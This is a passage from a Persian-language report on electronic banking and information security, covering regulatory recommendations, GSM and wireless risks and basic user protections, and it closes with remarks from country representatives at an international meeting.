ﺩﺭﺳﺘﻲ ﻣﺪﻳﺮﻳﺖ ﻧـﺸﻮﻧﺪ ،ﻧـﺎﮔﺰﻳﺮ ﺍﻋﺘﻤـﺎﺩ ﻋﻤـﻮﻣﻲ ﻧـﺴﺒﺖ ﺑـﻪ
ﻓﻨﺎﻭﺭﻱ ﺧﺪﺷﻪﺩﺍﺭ ﺧﻮﺍﻫﺪ ﺷﺪ .ﺑﺎ ﺩﺭﻧﻈﺮ ﺩﺍﺷﺘﻦ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ،ﺑﺮﺍﻱ
ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺳﻄﻮﺡ ﺑﺎﻻﺗﺮﻱ ﺍﺯ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﮔﺎﻣﻬﺎﻱ
ﻣﺘﻌﺪﺩ ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺑﺮﺩﺍﺷﺖ:
ﺍﻭﻝ ،ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ،ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻭ ﺳﺎﻳﺮ ﺩﺳﺖﺍﻧﺪﺭﻛﺎﺭﺍﻥ ﺑـﺎﺯﺍﺭ
ﺑﺎﻳﺪ ﺩﺭ ﺟﻬﺖ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﮔﺴﺘﺮﺵ ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ﺍﻣﻨﻴـﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻗﺪﺍﻡ ﻛﻨﻨﺪ.
ﺩﻭﻡ ،ﻫﻤﻜﺎﺭﻱ ﺑﺎﻳﺪ ﺑﻪ ﺍﻣﺮﻱ ﻋﺎﺩﻱ ﻭ ﻫﻤﻴﺸﮕﻲ ﺗﺒـﺪﻳﻞ ﺷـﻮﺩ؛
ﺑﺨﺼﻮﺹ ﺑﺎ ﻋﻨﺎﻳﺖ ﺧﺎﺹ ﺑﻪ ﺭﻓﻊ ﺗﻬﺪﻳﺪﺍﺕ ﻛﻠﻴﺪﻱ ﻛﻪ ﻣﺘﻮﺟـﻪ
ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻋﻤﻮﻡ ﻣﺸﺘﺮﻳﺎﻥ ﺍﺳﺖ.
ﺳﻮﻡ ،ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﺁﻣﻮﺯﺷـﻲ ﺑـﻪ ﻛﺎﺭﻛﻨـﺎﻥ ﻭ ﻣﻤﻴـﺰﺍﻥ ﻗـﺴﻤﺖ
ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﺍﺯ ﺍﻭﻟﻮﻳﺖ ﺑـﺎﻻﻳﻲ ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺗﺠـﺎﺭﻱ ﻭ ﺩﻭﻟـﺖ
ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﺪ .ﺗﻌﺮﻳﻒ ﻭ ﮔﺴﺘﺮﺓ ﻋﻤﻠﻲ ﻣﺨﺎﻃﺮﺍﺕ ﺑﺎﻳـﺪ ﺷـﺎﻣﻞ
ﻲ ﺗﻬﺪﻳــﺪﺍﺕ
ﺍﻧــﻮﺍﻉ ﻣﺨــﺎﻃﺮﺍﺕ ﺳــﺎﻳﺒﺮ ﺑﻌــﻼﻭﺓ ﺍﹶﺷــﻜﺎﻝ ﺳــﻨﺘ ﹺ
ﺍﻃﻼﻋﺎﺗﻲ ﻭ ﻓﻴﺰﻳﻜﻲ ﻧﻴﺰ ﺑﺎﺷﺪ.
ﻧﻈﺎﺭﺕ ﺑﺮ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ
ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ
ﺩﺭ ﺣﺎﻟﻲ ﻛﻪ ﺑﺨﺶ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺍﺗﺮ ﺍﺯ ﻣـﺮﺯ ﺗﻮﺍﻧﺎﻳﻴﻬـﺎ ﻭ
ﺍﺳﺘﻌﺪﺍﺩﻫﺎﻱ ﻣﺤﻠﻲ ﺭﺷﺪ ﻣﻲﻛﻨﺪ ،ﺭﺟﻮﻉ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ ﺑـﺮﺍﻱ
ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﻪ ﻳﻚ ﻛﺎﺭ ﺭﺍﻳﺞ ﺗﺒﺪﻳﻞ ﺷﺪﻩ ﻭ ﺧﺼﻮﺻﹰﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﺍﺯ ﻣﻨﺎﺑﻊ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺑـﺮﺍﻱ ﺍﻳـﻦ ﻣﻨﻈـﻮﺭ ،ﻫـﻢ ﺗﻬﺪﻳـﺪﻫﺎ ﻭ ﻫـﻢ
ﻓﺮﺻﺘﻬﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﺍﺳﺖ.
ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ ﺟﻬـﺖ ﻛـﺎﻫﺶ ﺗﻬﺪﻳـﺪ ﻫـﺎﻱ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻳﻚ ﺗﻮﻓﻴﻖ ﺍﺟﺒﺎﺭﻱ ﺑﺮﺍﻱ
ﺑﺎﻧﻜﻬﺎ ﺩﺍﻧﺴﺖ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨـﺪ ﻳـﻚ ﺑﺮﻧﺎﻣـﺔ ﻭﺍﻛﻨـﺸﻲ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩ ﻫﺎﻱ ﻣﺸﺘﺮﻱ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺗﻬﺪﻳـﺪﻫﺎ ﺗـﺪﻭﻳﻦ
ﻛﻨﻨﺪ ﻭ ﺩﺭ ﺍﻳﻦ ﻣﺴﻴﺮ ﺗﻤﺎﻡ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻱ ﻻﺯﻡ ﺭﺍ ﻧﻴﺰ ﺑـﺮﺍﻱ ﺁﻧﻬـﺎ
ﻓــﺮﺍﻫﻢ ﻣــﻲﺁﻭﺭﺩ .ﺩﺭ ﭼﻨــﻴﻦ ﺑﺮﻧﺎﻣــﻪﺍﻱ ﺑﺎﻳــﺪ ﻓﺮﺁﻳﻨــﺪﻫﺎﻱ
ﺁﮔﺎﻫﻲﻳﺎﻓﺘﻦ ﻣﺸﺘﺮﻳﺎﻥ ﺍﺯ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻓﺸﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻃﻼﻋﺎﺕ
ﻧﻴﺰ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ.
ﻋﻠﻴﺮﻏﻢ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﭘﻴﭽﻴﺪﺓ ﺍﺑﺘﻜﺎﺭﻱ ،ﻫﻨﻮﺯ ﻫﻢ ﺍﻣﻨﻴﺖ
ﺑﻪ ﺍﻣﺮﻱ ﺳﺎﺩﻩ ﺗﺒﺪﻳﻞ ﻧﺸﺪﻩ ﺍﺳﺖ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﻤﭽﻨﺎﻥ ﻣﺮﺍﻗﺒﺖ ﻭ
ﺁﻣﻮﺯﺵ ﻣﺪﺍﻭﻡ ﺿﺮﻭﺭﻱ ﺍﺳﺖ .ﺑﻌﻀﻲ ﺣﻮﺯﻩﻫﺎﻱ ﺟﺪﻳﺪ ﻣﺒﺎﺣـﺚ
ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺗﻮﺟﻪ ﺑﻴﺸﺘﺮﻱ ﻣﻲﻃﻠﺒﻨـﺪ ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ:
ﺍﺭﺯﻳﺎﺑﻲ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ،ﺁﺯﻣﻮﻥ ﻧﻔﻮﺫ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢ ﻳـﺎﺏ ،ﻭ
ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ.
ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺳﻴﺎﺭ:
ﺩﺳﺘﺎﻭﺭﺩﻫﺎ ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻳﺪ
ﺩﺭ ﺳﺎﻝ GSM ،۲۰۰۲ﺣﺪﻭﺩ ۷۸۷ﻣﻴﻠﻴـﻮﻥ ﻛـﺎﺭﺑﺮ ﺩﺭ ﺳﺮﺍﺳـﺮ
ﺩﻧﻴﺎ ﺩﺍﺷﺖ .ﻓﻨﺎﻭﺭﻱ ﺑﻲ ﺳﻴﻢ ﺑﺎ ﺳﺮﻋﺘﻲ ﻣﻌﺎﺩﻝ ﺳﻪ ﺑﺮﺍﺑﺮ ﺳﺮﻋﺖ
ﺧﻄﻮﻁ ﺯﻣﻴﻨﻲ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﺍﺳﺖ .ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﻧﻴﺰ ﻣﺎﻧﻨـﺪ ﺳـﺎﻳﺮ
ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻧﺴﺒﺖ ﺑﻪ ﺗﻜـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻣﺨـﺮﺏ ﻣﺜـﻞ
ﺗﺮﺍﻭﺍﻫﺎ ،ﻭﻳﺮﻭﺳـﻬﺎ ﻭ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ﺁﺳـﻴﺐﭘـﺬﻳﺮ
ﻣﻲﺑﺎﺷﺪ .ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺩﺭ ﻣﺤﻴﻂ ﺧـﺼﻤﺎﻧﺔ ﺍﻳﻨﺘﺮﻧـﺖ ،ﭘﺎﺷـﻨﺔ
ﻻ ﺍﺗـﺼﺎﻝ ﺑـﻲﺳـﻴﻢ
ﺁﺷﻴﻞ ﺍﻣﻨﻴﺖ ﺑـﻪ ﺣـﺴﺎﺏ ﻣـﻲﺁﻳـﺪ .ﻣﻌﻤـﻮ ﹰ
ﺿــﻌﻴﻔﺘﺮﻳﻦ ﺣﻠﻘــﺔ ﺯﻧﺠﻴــﺮ ﺍﻣﻨﻴﺘــﻲ ﻣﺤــﺴﻮﺏ ﻣــﻲﺷــﻮﺩ.
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ GSMﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻛـﺎﺭﺕ ،SIM
ﺑﻤﺒﺎﺭﺍﻥ ،SMSﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ،WAPﻭ ﻧﻴﺰ ﺣﻤﻠﻪﺍﻱ ﻛﻪ ﺑـﺎ
٢٣٦
ﻧﺎﻡ " "man in the middleﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ.
ﺍﮔﺮﭼﻪ ﺍﻳﻤﻦﺳﺎﺯﻱ ﻛﺎﻣﻞ ﻓﻨﺎﻭﺭﻱ GSMﻣﻤﻜـﻦ ﻧﻴـﺴﺖ ،ﺍﻣـﺎ
ﻛﺎﺭﺑﺮ ﺑﺎ ﭼﻨﺪ ﮔﺎﻡ ﺳﺎﺩﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ
ﺑﻌﻤﻞ ﺁﻭﺭﺩ:
•
•
•
ﻓﻌﺎﻝ ﻛﺮﺩﻥ ﺭﻣﺰ ﻋﺒﻮ ﹺﺭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ؛
ﻧﺼﺐ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺿﺪﻭﻳﺮﻭﺱ؛
ﻧﺼﺐ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺷﺨﺼﻲ ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﺭﻣﺰﮔﺬﺍﺭﻱ؛
۲۳۶ﺩﺭ ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻠﻪ ﻳﻚ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﺧﻮﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻚ
ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﺗﻠﻔﻨﻬﺎﻱ ﻫﻤـﺮﺍﻩ ﻣﻌﺮﻓـﻲ ﻣـﻲﻛﻨـﺪ ﻭ
ﺑﺪﻳﻦ ﺗﺮﺗﻴـﺐ ﻣﻬـﺎﺟﻢ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺑـﺪﺯﺩﺩ .ﺍﻃﻼﻋـﺎﺕ ﺩﺭ
ﻼ ﺧﺎﻟﺺ ﻭ ﺑﺪﻭﻥ ﻫﺮﮔﻮﻧﻪ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻫـﺴﺘﻨﺪ ،ﻭ
gatewayﻫﺎ ﻛﺎﻣ ﹰ
ﺍﻳﻦ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺍﻃﻼﻋﺎﺕ ﺁﻧﻬﺎ ﺑﺎ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺑﺰﺭﮔﻲ
ﺭﻭﺑﺮﻭ ﺑﺎﺷﻨﺪ.
٢٢٣
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
•
•
ﺍﻃﻤﻴﻨــﺎﻥ ﺍﺯ ﻧﮕﻬــﺪﺍﺭﻱ ﺍﻳﻤــﻦ ﺍﺯ ﻭﺳــﺎﻳﻞ ،ﻭ ﺣﻔﺎﻇــﺖ ﺍﺯ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺑﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ؛
ﻧﺼﺐ ﻧﺮﻡ ﺍﻓﺰﺍﺭ .VPNﺩﺭ ﻣﻮﺭﺩ ﻛﺎﺭﺗﻬـﺎﻱ ﻫﻮﺷـﻤﻨﺪ ﻧﻴـﺰ
ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ﻧﺒﺎﻳﺪ ﺷﻤﺎﺭﻩﻫﺎﻱ PINﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻛﻨﻨﺪ.
ﺳﺨﻨﺮﺍﻧﻴﻬﺎﻱ ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﻛﺸﻮﺭﻫﺎ
ﺩﺭ ﻃﻮﻝ ﺑﺮﮔـﺰﺍﺭﻱ ﺍﻳـﻦ ﻧﺸـﺴﺖ ﺟﻬـﺎﻧﻲ ﺍﺯ ﻧﻤﺎﻳﻨـﺪﮔﺎﻥ ﻛﻠﻴـﺔ
ﻛﺸﻮﺭﻫﺎ ﺧﻮﺍﺳﺘﻪ ﺷﺪ ﻛﻪ ﺑﻪ ﺳﻪ ﺳﺆﺍﻝ ﺯﻳﺮ ﭘﺎﺳﺦ ﺩﻫﻨﺪ:
.۲
ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻣﺆﺳﺴﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ ﺩﺭ ﻛﺸﻮﺭ ﺷﻤﺎ ﺍﺯ ﭼـﻪ
ﻓﺮﺁﻳﻨﺪﻫﺎﻳﻲ ﺟﻬﺖ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﭘﻴﺮﻭﻱ ﻣﻲﻛﻨﻨﺪ ﻭ ﭼﻪ ﺗﻐﻴﻴﺮﺍﺗﻲ ﺭﺍ ﺩﺭ ﻓﺮﺁﻳﻨﺪ ﻧﻈﺎﺭﺕ ﺧﻮﺩ
ﺩﺭﻧﻈﺮ ﺩﺍﺭﻧﺪ؟
.۳
ﻣﺆﺳﺴﺎﺕ ﭼﻨﺪﺟﺎﻧﺒﻪ ﻭ ﭼﻨﺪﻣﻠﻴﺘﻲ ﭼﻄـﻮﺭ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﺑـﺎ
ﻫﻤﻜﺎﺭﻱ ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻛﻨﻨﺪ؟
ﻳﻚ ﻧﻤﺎﻳﻨﺪﺓ ﻛﺸﻮﺭ ﺳﻨﮕﺎﭘﻮﺭ ،ﺩﺭ ﭘﺎﺳﺦ ﺑﻪ ﺍﻳﻦ ﭘﺮﺳﺶ ﭘﻴـﺸﻨﻬﺎﺩ
ﺟﺮﻳﻤﻪﻫﺎﻱ ﺷﺪﻳﺪ ﺍﺩﺍﺭﻱ ﻭ ﺑـﻪﺭﻭﺯﻛـﺮﺩﻥ ﻣﻘـﺮﺭﺍﺕ ﺩﺭ ﻓﻮﺍﺻـﻞ
ﺯﻣﺎﻧﻲ ﻣﻨﻈﻢ ﺭﺍ ﺩﺍﺩ؛ ﭼﺮﺍﻛﻪ ﻣﻌﺘﻘﺪ ﺑﻮﺩ ﻗﻮﺍﻧﻴﻨﻲ ﻣﺜﻞ "ﻗﺎﻧﻮﻥ ﺳﻮﺀ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪ" ،ﻓﺎﻳﺪﺓ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺗﺸﺨﻴﺺ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ
ﻛﺎﻫﺶ ﺟﺎﺫﺑﺔ ﺁﻥ ﺑﺮﺍﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻏﻴﺮﺣﺮﻓﻪﺍﻱ ﻧﺸﺎﻥ ﺩﺍﺩﻩﺍﻧﺪ.
ﻳﻚ ﻧﻤﺎﻳﻨﺪﺓ FBIﻧﻴﺰ ﺑﻴﺎﻥ ﻛﺮﺩ ﻛﻪ ﺍﻳﻦ ﻳﻚ ﭘﺪﻳـﺪﺓ ﺍﺟﺘﻤـﺎﻋﻲ
ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻭ ﻏﻴﺮﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻣﺮﺯﻫﺎ ﺍﺳﺖ .ﺩﺭ ﺑﻌـﻀﻲ ﻣـﻮﺍﺭﺩ ﻓـﺮﺩ
ﺧﻄﺎﻛﺎﺭ ﺷﺪﺕ ﺟﺮﻣﻲ ﻛﻪ ﺩﺭﺣﺎﻝ ﺍﺭﺗﻜﺎﺏ ﺁﻥ ﺍﺳﺖ ﺭﺍ ﺗﺸﺨﻴﺺ
ﻧﻤﻲﺩﻫﺪ .ﺩﺭ ﺣﻘﻴﻘﺖ ﺑﻌﻀﻲ ﺍﻓـﺮﺍﺩ ﺟـﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ ﺑﻌﻨـﻮﺍﻥ
ﺟﺮﻡ ﻭﺍﻗﻌﻲ ﺑﻪ ﺭﺳﻤﻴﺖ ﻧﻤﻲﺷﻨﺎﺳﻨﺪ .ﺑﻌﻼﻭﻩ ﺑﺎﻧﻜﻬـﺎ ﻫـﻢ ﺑـﺮﺍﻱ
ﺟﺬﺏ ﻣﺸﺘﺮﻱ ﺑﻴﺸﺘﺮ ﺍﻳﻨﻄﻮﺭ ﻭﺍﻧﻤﻮﺩ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﻓﺴﺎﻧﺔ ﺍﻣﻨﻴـﺖ
ﺭﺍ ﺟﺎﻭﺩﺍﻧﻲ ﻛﺮﺩﻩﺍﻧﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺷـﻨﺎﺧﺖ ﺑﻴـﺸﺘﺮﻱ
ﺩﺭ ﻣﻮﺭﺩ ﻣﺨﺎﻃﺮﺍﺕ ﺧﺪﻣﺎﺕ ﻣـﺎﻟﻲ ﻭ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﻪ
ﻋﻤﻮﻡ ﻣﺮﺩﻡ ﺩﺍﺩﻩ ﺷﻮﺩ ،ﭼﺮﺍﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﺣـﻮﺯﻩ ﻣـﺴﺪﻭﺩ ﻛـﺮﺩﻥ
ﺍﻃﻼﻋــﺎﺕ ﺗﻨﻬــﺎ ﻣــﺸﻜﻼﺕ ﺭﺍ ﺣــﺎﺩﺗﺮ ﻣــﻲﻛﻨــﺪ .ﺑﺨــﺼﻮﺹ،
ﻣــﺸﻜﻼﺕ ﺷــﮕﺮﻓﻲ ﺩﺭ ﺭﺍﺑﻄــﻪ ﺑــﺎ ﻃﺒﻴﻌــﺖ ﻓﺮﺍﺑﺨــﺸﻲ ﺟــﺮﺍﺋﻢ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺍﺯ ﺟﻤﻠﻪ ﻧﻔﻮﺫﻫﺎﻱ ﺳﺎﻳﺒﺮ ﻭ ﺩﺳﺘﻜﺎﺭﻱ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ
ﺑﺎﻧﻜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ
ﻻﺯﻡ ﺍﺳﺖ.
ﺑﺮﺯﻳﻞ
ﻧﻤﺎﻳﻨﺪﺓ ﺑﺮﺯﻳﻞ ﺧﺎﻃﺮﻧﺸﺎﻥ ﻛﺮﺩ ﻛﻪ ﺭﻗﺎﺑﺖ ،ﺷﺮﻛﺘﻬﺎ ﺭﺍ ﺑﻪ ﺳﺎﺧﺖ
ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﭘﻴﺸﺮﻓﺘﻪ ﻫﺪﺍﻳﺖ ﻣﻲﻛﻨﺪ ،ﺍﻣﺎ ﺍﻳـﻦ ﻓﻨﺎﻭﺭﻳﻬـﺎ ﻣـﺴﺘﻌﺪ
ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻫﺴﺘﻨﺪ .ﻣﻴﺎﻥ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺧـﺪﻣﺎﺕ ﺍﺯ ﻳـﻚ ﺳـﻮ ﻭ
ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎ ﺍﺯ ﺳﻮﻱ ﺩﻳﮕﺮ ،ﻳﻚ ﺗـﻮﺍﺯﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ .ﻛـﺎﺭﺁﻳﻲ
ﻓﻨﻮﻥ ﺑﺮﮔـﺰﺍﺭﻱ ﺁﺯﻣـﻮﻥ ﺑـﺮﺍﻱ ﺩﻭﺭﻩﻫـﺎﻱ ﺁﻣﻮﺯﺷـﻲ ﺩﺭ ﺑﺮﺯﻳـﻞ
ﺩﺭﺣﺎﻝ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ.
ﺩﺭ ﭘﺎﺳــﺦ ﺑــﻪ ﺍﻳــﻦ ﺳــﺆﺍﻝ ﻛــﻪ ﻣﺆﺳــﺴﺎﺕ ﭼﻨــﺪﻣﻠﻴﺘﻲ ﭼﮕﻮﻧـﻪ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻛﺸﻮﺭﻫﺎ ﻛﻤﻚ ﻛﻨﻨﺪ ،ﺑﺮﺯﻳﻠﻲ ﻫﺎ ﻣﺎﻳﻞ ﺑﻮﺩﻧﺪ ﻛﻪ ﺩﺭ
ﺯﻣﻴﻨﻪﻫﺎﻱ ﺯﻳﺮ ﺑﻪ ﺁﻧﻬـﺎ ﻛﻤـﻚ ﺷـﻮﺩ :ﺑﺮﮔـﺰﺍﺭﻱ ﺁﺯﻣـﻮﻥ ﺑـﺮﺍﻱ
ﺩﻭﺭﻩﻫﺎﻱ ﺁﻣﻮﺯﺷﻲ ،ﺗﺪﻭﻳﻦ ﺭﺍﻫﻜﺎﺭﻫﺎ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ ،ﻭ
ﻧﻴﺰ ﺍﻳﺠﺎﺩ ﻣﺪﻟﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺑﺎ ﺣﺪﺍﻗﻞ ﻗﻮﺍﻧﻴﻦ ﺑﺎﻧﻜﻲ.
ﭘﺮﺳﺶ
ﺑﺮﺯﻳﻠﻲﻫﺎ ﭘﺮﺳﻴﺪﻧﺪ ﻛﻪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻃﺒﻴﻌﺖ ﭘﻮﻳﺎ ﻭ ﭘﻴﺸﺮﻓﺖ ﺳﺮﻳﻊ
ﻓﻨﺎﻭﺭﻱ ﻛﻪ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺭﺍ ﻣﺸﻜﻞ ﺳـﺎﺧﺘﻪ ،ﭼﮕﻮﻧـﻪ ﻣـﻲ ﺗـﻮﺍﻥ
ﺯﻳﺮﺳﺎﺧﺖ ﻗﺎﻧﻮﻧﻲ ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﺟﺮﺍﺋﻢ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﺮﺩ.
ﻣﻜﺰﻳﻚ
ﺩﺭ ﭘﺎﺳــﺦ ﺑــﻪ ﻧﮕﺮﺷــﻬﺎﻱ ﻣﻤﻜــﻦ ﺩﺭ ﺭﺧــﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴــﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،ﻣﻜﺰﻳــﻚ ﺍﺷــﺎﺭﻩ ﻛــﺮﺩ ﻛــﻪ ﺍﻣﻜــﺎﻥ ﺩﺳﺘﺮﺳــﻲ
ﺑﻪﺷﻤﺎﺭﻩﻫﺎﻱ PINﺍﺯ ﻃﺮﻳﻖ ﻭﺏ ﺭﻭ ﺑﻪ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ ﻭ ﺍﻳـﻦ
ﻣﺴﺌﻠﻪ ﺟﺪﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﻴﺸﺘﺮ ﻣﻲﻛﻨﺪ .ﺩﺭ ﻫﺮ ﺻـﻮﺭﺕ ﺁﻧﻬـﺎ
ﺗﻼﺷﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﻛﻨﻨﺪ،
ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻇﺮﻓﻴﺘﻬﺎﻱ ﻛﻨﺘﺮﻟـﻲ ﻗـﻮﻱ ﺩﺍﺭﻧـﺪ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ
